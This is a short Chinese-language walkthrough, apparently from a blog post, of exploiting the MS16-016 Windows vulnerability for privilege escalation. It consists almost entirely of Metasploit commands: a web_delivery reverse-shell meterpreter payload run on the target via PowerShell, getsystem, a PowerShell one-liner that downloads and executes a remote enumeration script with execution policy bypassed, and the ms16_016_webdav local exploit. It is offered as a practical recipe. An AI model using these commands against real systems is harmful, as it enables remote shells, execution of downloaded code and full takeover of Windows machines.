MS16-016漏洞提权实战
- 启动msf
- use exploit/multi/script/web_delivery
- info
- set target 2
- show payloads
- set payload windows/meterpreter/reverse_tcp
- show options
- exploit
- 复制生成的powershell命令
- 打开目标机,打开cmd,执行刚刚复制的内容
- 连接
- getsystem
- getuid
- shell
- whoami
- powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1'); Find-AllVulns" > hq.txt
- type hq.txt
- exit
- backgroud
- search MS16-016
- use exploit/windows/local/ms16_016_webdav
- show options
- set session 1
- exploit
网友评论